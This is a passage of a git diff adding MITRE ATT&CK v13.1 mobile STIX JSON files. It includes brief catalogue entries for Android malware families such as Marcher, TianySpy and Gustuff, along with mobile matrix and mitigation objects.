"x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f7e7b736-2cff-4c2a-9232-352cd383463a.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f7e7b736-2cff-4c2a-9232-352cd383463a.json new file mode 100644 index 0000000000000000000000000000000000000000..67825a862b78939cfbe37175b66007ee7a5c1b31 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f7e7b736-2cff-4c2a-9232-352cd383463a.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--38a2f7aa-63c9-4826-acb9-ca14e9dc0a0f", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Android/AdDisplay.Ashas" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--f7e7b736-2cff-4c2a-9232-352cd383463a", + "type": "malware", + "created": "2020-10-29T19:19:08.848Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0525", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0525" + }, + { + "source_name": "WeLiveSecurity AdDisplayAshas", + "url": "https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/", + "description": "L. Stefanko. (2019, October 24). Tracking down the developer of Android adware affecting millions of users. Retrieved October 29, 2020." + } + ], + "modified": "2020-10-29T19:19:08.848Z", + "name": "Android/AdDisplay.Ashas", + "description": "[Android/AdDisplay.Ashas](https://attack.mitre.org/software/S0525) is a variant of adware that has been distributed through multiple apps in the Google Play Store. (Citation: WeLiveSecurity AdDisplayAshas)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f9854ba6-989d-43bf-828b-7240b8a65291.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f9854ba6-989d-43bf-828b-7240b8a65291.json new file mode 100644 index 0000000000000000000000000000000000000000..2909f49509c918c5677efcf2bf9ffeaf54927816 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f9854ba6-989d-43bf-828b-7240b8a65291.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--1a0a7a55-92dd-4a22-958c-67895909c532", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Marcher", + "description": "[Marcher](https://attack.mitre.org/software/S0317) is Android malware that is used for financial fraud. (Citation: Proofpoint-Marcher)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--f9854ba6-989d-43bf-828b-7240b8a65291", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0317", + "external_id": "S0317" + }, + { + "source_name": "Proofpoint-Marcher", + "description": "Proofpoint. (2017, November 3). Credential phishing and an Android banking Trojan combine in Austrian mobile attacks. Retrieved July 6, 2018.", + "url": "https://www.proofpoint.com/us/threat-insight/post/credential-phishing-and-android-banking-trojan-combine-austrian-mobile-attacks" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--fd6d56b2-d84e-4d2a-b37d-d4678d3e08a6.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--fd6d56b2-d84e-4d2a-b37d-d4678d3e08a6.json new file mode 100644 index 0000000000000000000000000000000000000000..40949a2fda41f4bdb9add6b1894ecca43f6833b2 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--fd6d56b2-d84e-4d2a-b37d-d4678d3e08a6.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--88766868-8743-4f63-9ebc-2b700500db46", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-29T21:11:14.364Z", + "name": "TianySpy", + "description": "[TianySpy](https://attack.mitre.org/software/S1056) is a mobile malware primarily spread by SMS phishing between September 30 and October 12, 2021. [TianySpy](https://attack.mitre.org/software/S1056) is believed to have targeted credentials associated with membership websites of major Japanese telecommunication services.(Citation: trendmicro_tianyspy_0122) ", + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "TianySpy" + ], + "type": "malware", + "id": "malware--fd6d56b2-d84e-4d2a-b37d-d4678d3e08a6", + "created": "2023-01-19T18:05:30.924Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1056", + "external_id": "S1056" + }, + { + "source_name": "trendmicro_tianyspy_0122", + "description": "Trend Micro. (2022, January 25). TianySpy Malware Uses Smishing Disguised as Message From Telco. Retrieved January 11, 2023.", + "url": "https://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--ff742eeb-1f90-4f5a-8b92-9d40fffd99ca.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--ff742eeb-1f90-4f5a-8b92-9d40fffd99ca.json new file mode 100644 index 0000000000000000000000000000000000000000..542ecb8b41e0407218a927f7bc42096c7c169bf8 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--ff742eeb-1f90-4f5a-8b92-9d40fffd99ca.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--c4fed240-1a26-498f-a99d-262b353e498a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "DressCode", + "description": "[DressCode](https://attack.mitre.org/software/S0300) is an Android malware family. (Citation: TrendMicro-DressCode)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--ff742eeb-1f90-4f5a-8b92-9d40fffd99ca", + "created": "2017-10-25T14:48:37.856Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0300", + "external_id": "S0300" + }, + { + "source_name": "DressCode", + "description": "(Citation: TrendMicro-DressCode)" + }, + { + "source_name": "TrendMicro-DressCode", + "description": "Echo Duan. (2016, September 29). DressCode and its Potential Impact for Enterprises. Retrieved December 22, 2016.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/dresscode-potential-impact-enterprises/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617.json new file mode 100644 index 0000000000000000000000000000000000000000..d9987aa324177784a98e1e24b6fc17af1cad0a52 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--a575a2cd-8a18-4760-9605-4012abb89a98", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Gustuff" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "type": "malware", + "created": "2019-09-03T20:08:00.241Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0406", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0406" + }, + { + "source_name": "Talos Gustuff Apr 2019", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019." + } + ], + "modified": "2019-10-14T19:14:17.007Z", + "name": "Gustuff", + "description": "[Gustuff](https://attack.mitre.org/software/S0406) is mobile malware designed to steal users' banking and virtual currency credentials.(Citation: Talos Gustuff Apr 2019)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/marking-definition/marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168.json b/cti-ATT-CK-v13.1/mobile-attack/marking-definition/marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168.json new file mode 100644 index 0000000000000000000000000000000000000000..f640d09b37b55a546efe48a0e1493340e724c0e1 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/marking-definition/marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168.json @@ -0,0 +1,18 @@ +{ + "type": "bundle", + "id": "bundle--4523d20e-c390-45e6-81df-70917688e607", + "spec_version": "2.0", + "objects": [ + { + "definition": { + "statement": "Copyright 2015-2023, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation." + }, + "id": "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168", + "type": "marking-definition", + "created": "2017-06-01T00:00:00.000Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "definition_type": "statement", + "x_mitre_attack_spec_version": "2.1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/mobile-attack.json b/cti-ATT-CK-v13.1/mobile-attack/mobile-attack.json new file mode 100644 index 0000000000000000000000000000000000000000..33bd6ad6745f554b898db637e15053b000ff4cce --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/mobile-attack.json 
@@ -0,0 +1,45463 @@ +{ + "type": "bundle", + "id": "bundle--eb94af3a-7838-4380-9f08-5d9142bc7b40", + "objects": [ + { + "tactic_refs": [ + "x-mitre-tactic--9eb4c21e-4fa8-44c9-b167-dbfc455f9210", + "x-mitre-tactic--e78d7d60-41b5-49b7-b0a9-5c5d4cbabe17" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "x-mitre-matrix", + "id": "x-mitre-matrix--5104d5f0-16b7-4aec-8ae3-0a90cd5494fc", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "mobile-attack", + "url": "https://attack.mitre.org/matrices/mobile-attack" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "Below are the tactics and techniques representing the two MITRE ATT&CK Matrices for Mobile. The Matrices cover techniques involving device access and network-based effects that can be used by adversaries without device access. The Matrices contains information for the following platforms: Android, iOS.", + "modified": "2022-04-06T15:44:04.736Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Network-Based Effects", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "tactic_refs": [ + "x-mitre-tactic--0a93fd8e-4a83-4c15-8203-db290e5f2ac6", + "x-mitre-tactic--4a800987-a3a8-4d56-a1bd-0d7171431756", + "x-mitre-tactic--363bbeff-bb2a-4734-ac74-d6d37202fe54", + "x-mitre-tactic--3e962de5-3280-43b7-bc10-334fbc1d6fa8", + "x-mitre-tactic--987cda6d-eb77-406b-bf68-bcb5f3d2e1df", + "x-mitre-tactic--6fcb36b8-3776-483b-8699-42215714fb10", + "x-mitre-tactic--d418cdeb-1b9f-4a6b-a15d-2f89f549f8c1", + "x-mitre-tactic--7be441c2-0095-4b1e-8125-fa8ffda29b0f", + "x-mitre-tactic--7a0d25d3-f0c0-40bf-bf90-c743871b19ba", + "x-mitre-tactic--3f660805-fa2e-42e8-8851-57f9e9b653e3", + "x-mitre-tactic--10fa8d8d-1b04-4176-917e-738724239981", + 
"x-mitre-tactic--6ebce653-294a-444a-bffb-14c04c8d137e" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "x-mitre-matrix", + "id": "x-mitre-matrix--a382db5e-d009-4135-b893-0e0ff021c95b", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "mobile-attack", + "url": "https://attack.mitre.org/matrices/mobile-attack" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Below are the tactics and technique representing the MITRE ATT&CK Matrix for Mobile. The Matrix contains information for the following platforms: Android, iOS.", + "modified": "2022-04-06T15:43:22.080Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Mobile ATT&CK", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "type": "course-of-action", + "created": "2017-10-25T14:48:51.657Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1006", + "external_id": "M1006" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Use Recent OS Version", + "description": "New mobile operating system versions bring not only patches against discovered vulnerabilities but also often bring security architecture improvements that provide resilience against potential vulnerabilities or weaknesses that have not yet been discovered. 
They may also bring improvements that block use of observed adversary techniques.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "course-of-action", + "id": "course-of-action--1553b156-6767-47f7-9eb4-2a692505666d", + "created": "2019-10-18T12:49:58.924Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1005", + "url": "https://attack.mitre.org/mitigations/M1005" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "Enterprises can vet applications for exploitable vulnerabilities or unwanted (privacy-invasive or malicious) behaviors. Enterprises can inspect applications themselves or use a third-party service.\n\nEnterprises may impose policies to only allow pre-approved applications to be installed on their devices or may impose policies to block use of specific applications known to have issues. In Bring Your Own Device (BYOD) environments, enterprises may only be able to impose these policies over an enterprise-managed portion of the device.\n\nApplication Vetting is not a complete mitigation. 
Techniques such as [Evade Analysis Environment](https://attack.mitre.org/techniques/T1523) exist that can enable adversaries to bypass vetting.", + "modified": "2022-04-06T14:47:46.019Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Application Vetting", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1", + "type": "course-of-action", + "created": "2017-10-25T14:48:53.732Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1013", + "external_id": "M1013" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Application Developer Guidance", + "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "type": "course-of-action", + "created": "2017-10-25T14:48:53.318Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1012", + "external_id": "M1012" + } + ], + "modified": "2020-06-24T15:08:18.395Z", + "name": "Enterprise Policy", + "description": "An enterprise mobility management (EMM), also known as mobile 
device management (MDM), system can be used to provision policies to mobile devices to control aspects of their allowed behavior.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "type": "course-of-action", + "created": "2019-10-18T12:53:03.508Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1011", + "url": "https://attack.mitre.org/mitigations/M1011" + } + ], + "modified": "2019-10-18T15:51:48.318Z", + "name": "User Guidance", + "description": "Describes any guidance or training given to users to set particular configuration settings or avoid specific potentially risky behaviors.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--7b1cf46f-784b-405a-a8dd-4624c19d8321", + "type": "course-of-action", + "created": "2017-10-25T14:48:52.270Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1004", + "external_id": "M1004" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "System Partition Integrity", + "description": "Ensure that Android devices being used include and enable the Verified Boot capability, which cryptographically ensures the integrity of the system partition.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + 
"mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--8220b57e-c400-4525-bf69-f8edc6b389a8", + "type": "course-of-action", + "created": "2017-10-25T14:48:50.769Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1009", + "external_id": "M1009" + }, + { + "source_name": "TechCrunch-ATS", + "description": "Kate Conger. (2016, June 14). Apple will require HTTPS connections for iOS apps by the end of 2016. Retrieved December 19, 2016.", + "url": "https://techcrunch.com/2016/06/14/apple-will-require-https-connections-for-ios-apps-by-the-end-of-2016/" + }, + { + "source_name": "Android-NetworkSecurityConfig", + "description": "Google. (n.d.). Network Security Configuration. Retrieved December 19, 2016.", + "url": "https://developer.android.com/training/articles/security-config.html" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Encrypt Network Traffic", + "description": "Application developers should encrypt all of their application network traffic using the Transport Layer Security (TLS) protocol to ensure protection of sensitive data and deter network-based attacks. If desired, application developers could perform message-based encryption of data before passing it for TLS encryption.\n\niOS's App Transport Security feature can be used to help ensure that all application network traffic is appropriately protected. 
Apple intends to mandate use of App Transport Security (Citation: TechCrunch-ATS) for all apps in the Apple App Store unless appropriate justification is given.\n\nAndroid's Network Security Configuration feature similarly can be used by app developers to help ensure that all of their application network traffic is appropriately protected (Citation: Android-NetworkSecurityConfig).\n\nUse of Virtual Private Network (VPN) tunnels, e.g. using the IPsec protocol, can help mitigate some types of network attacks as well.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--8ccd428d-39da-4e8f-a55b-d48ea1d56e58", + "type": "course-of-action", + "created": "2017-10-25T14:48:49.554Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1003", + "external_id": "M1003" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Lock Bootloader", + "description": "On devices that provide the capability to unlock the bootloader (hence allowing any operating system code to be flashed onto the device), perform periodic checks to ensure that the bootloader is locked.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "type": "course-of-action", + "created": "2019-10-18T12:51:36.488Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1001", + "url": 
"https://attack.mitre.org/mitigations/M1001" + } + ], + "modified": "2019-10-18T14:56:15.631Z", + "name": "Security Updates", + "description": "Install security updates in response to discovered vulnerabilities.\n\nPurchase devices with a vendor and/or mobile carrier commitment to provide security updates in a prompt manner for a set period of time.\n\nDecommission devices that will no longer receive security updates.\n\nLimit or block access to enterprise resources from devices that have not installed recent security updates.\n\nOn Android devices, access can be controlled based on each device's security patch level. On iOS devices, access can be controlled based on the iOS version.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433", + "type": "course-of-action", + "created": "2017-10-25T14:48:52.601Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1010", + "external_id": "M1010" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Deploy Compromised Device Detection Method", + "description": "A variety of methods exist that can be used to enable enterprises to identify compromised (e.g. rooted/jailbroken) devices, whether using security mechanisms built directly into the device, third-party mobile security applications, enterprise mobility management (EMM)/mobile device management (MDM) capabilities, or other methods. 
Some methods may be trivial to evade while others may be more sophisticated.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--e829ee51-1caf-4665-ba15-7f8979634124", + "type": "course-of-action", + "created": "2017-10-25T14:48:50.181Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1014", + "external_id": "M1014" + }, + { + "source_name": "CSRIC5-WG10-FinalReport", + "description": "Communications Security, Reliability, Interoperability Council (CSRIC). (2017, March). Working Group 10 Legacy Systems Risk Reductions Final Report. Retrieved May 24, 2017.", + "url": "https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Interconnection Filtering", + "description": "In order to mitigate Signaling System 7 (SS7) exploitation, the Communications, Security, Reliability, and Interoperability Council (CSRIC) describes filtering interconnections between network operators to block inappropriate requests (Citation: CSRIC5-WG10-FinalReport).", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "course-of-action", + "id": "course-of-action--e944670c-d03a-4e93-a21c-b3d4c53ec4c9", + "created": "2017-10-25T14:48:51.365Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1007", + "url": "https://attack.mitre.org/mitigations/M1007" + } + ], + "x_mitre_deprecated": true, + "revoked": 
false, + "description": "Warn device users not to accept requests to grant Device Administrator access to applications without good reason.\n\nAdditionally, application vetting should include a check on whether the application requests Device Administrator access. Applications that do request Device Administrator access should be carefully scrutinized and only allowed to be used if a valid reason exists.", + "modified": "2022-04-06T14:47:19.714Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Caution with Device Administrator Access", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "type": "course-of-action", + "created": "2019-10-18T12:50:35.335Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1002", + "url": "https://attack.mitre.org/mitigations/M1002" + } + ], + "modified": "2019-10-18T14:52:53.019Z", + "name": "Attestation", + "description": "Enable remote attestation capabilities when available (such as Android SafetyNet or Samsung Knox TIMA Attestation) and prohibit devices that fail the attestation from accessing enterprise resources.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "CarbonSteal" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "type": "malware", + "created": "2020-11-10T16:50:38.917Z", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0529", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0529" + }, + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2021-09-20T13:54:19.819Z", + "name": "CarbonSteal", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) is one of a family of four surveillanceware tools that share a common C2 infrastructure. [CarbonSteal](https://attack.mitre.org/software/S0529) primarily deals with audio surveillance. (Citation: Lookout Uyghur Campaign)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Aviran Hazum, Check Point", + "Sergey Persikov, Check Point" + ], + "x_mitre_aliases": [ + "Cerberus" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": 